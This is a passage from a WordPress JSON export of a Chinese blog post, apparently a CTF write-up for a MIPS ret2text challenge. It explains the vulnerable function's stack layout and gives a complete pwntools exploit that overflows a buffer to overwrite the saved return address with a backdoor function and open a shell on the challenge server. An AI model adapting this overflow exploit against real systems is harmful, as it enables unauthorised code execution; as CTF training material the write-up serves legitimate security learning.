src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1051\"  sizes=\"auto, (max-width: 566px) 100vw, 566px\" \/><\/div><\/figure>\n\n\n\n<p>\u540e\u95e8\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/A2714ZVPS5KMN4T__O.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"305\" height=\"143\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/A2714ZVPS5KMN4T__O.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1052\"  sizes=\"auto, (max-width: 305px) 100vw, 305px\" \/><\/div><\/figure>\n\n\n\n<p>\u6253\u6cd5\u5f88\u7b80\u5355\uff0c\u6ea2\u51fa\u8986\u76d6\u8fd4\u56de\u5730\u5740\u5373\u53ef\u3002\u7531\u4e8e\u662f\u5f02\u67b6\u6784\uff0c\u4fa7\u91cd\u70b9\u5728\u4e8e\u5b66\u4e60\u5206\u6790\u4e00\u4e0b\u6c47\u7f16\u4ee3\u7801\u3002<\/p>\n\n\n\n<p>ctfshow\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/G0LXTA9XQUDSS1LIZ1K.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"836\" height=\"738\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/G0LXTA9XQUDSS1LIZ1K.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1053\"  sizes=\"auto, (max-width: 836px) 100vw, 836px\" 
\/><\/div><\/figure>\n\n\n\n<p>v1 变量占 0x18 字节，紧接着是保存在栈上的 $fp（作用类似 x86 的 ebp），再往上就是保存的返回地址 $ra。从这个栈布局可以看出 ctfshow 不是叶子函数——$ra 被保存在栈上，因此可以被溢出直接覆盖。所以 payload 是：<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload = b'A' * 24             # \u586b\u5145\u5230fp\npayload += p32(1)               # \u586b\u5145fp\npayload += p32(backdoor)        # \u586b\u5145ra<\/code><\/pre>\n\n\n\n<p>为什么没用 sleep？因为这是 ret2text，跳转目标是程序里已有的后门函数，它本来就在代码段中，并没有新写入内存的 shellcode 需要做缓存同步。另外两点注意：context 里的 endian 必须和目标二进制一致（可以用 file 或 readelf -h 确认），否则 p32 打出来的地址字节序是反的；p32(1) 只是用来占位覆盖保存的 $fp，后门函数的序言一般会重新建立自己的栈帧，所以这里填什么值都可以。<\/p>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext(arch='mips', endian='little', os='linux')\n\n# \u76ee\u6807\u7a0b\u5e8f\n#p = process('\/home\/monke\/Desktop\/MIPS_PWN\/pwn1')  # \u672c\u5730\u6d4b\u8bd5\np = remote('wn.challenge.ctf.show', 28302)  # \u8fdc\u7a0b\u653b\u51fb\n\n# \u5173\u952e\u5730\u5740\nbackdoor = 0x4005dc\n\n\n# \u6784\u9020 payload\npayload = b'A' * 24             # \u586b\u5145\u5230fp\npayload += p32(1)               # \u586b\u5145fp\npayload += p32(backdoor)        # \u586b\u5145ra\n#gdb.attach(p)\n# \u53d1\u9001 payload\np.sendlineafter(b\"Please enter your input: \", payload)\np.interactive()\n<\/code><\/pre>\n\n\n\n<p>\u6253\u901a\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/GAEB4QLR9V8JC@KV2LRJ3W-1024x382.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"382\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/05\/GAEB4QLR9V8JC@KV2LRJ3W-1024x382.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1054\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u53c2\u8003\u6587\u7ae0\uff1a https:\/\/blog.itewqq.cn\/mips-pwn-tutorial\/ https:\/ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[26],"class_list":["post-1039","post","type-post","status-publish","format-standard","hentry","category-13","tag-26"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1039","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=1039"}],"version-history":[{"count":6,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1039\/revisions"}],"predecessor-version":[{"id":1055,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/1039\/revisions\/1055"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=1039"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=1039"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=1039"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}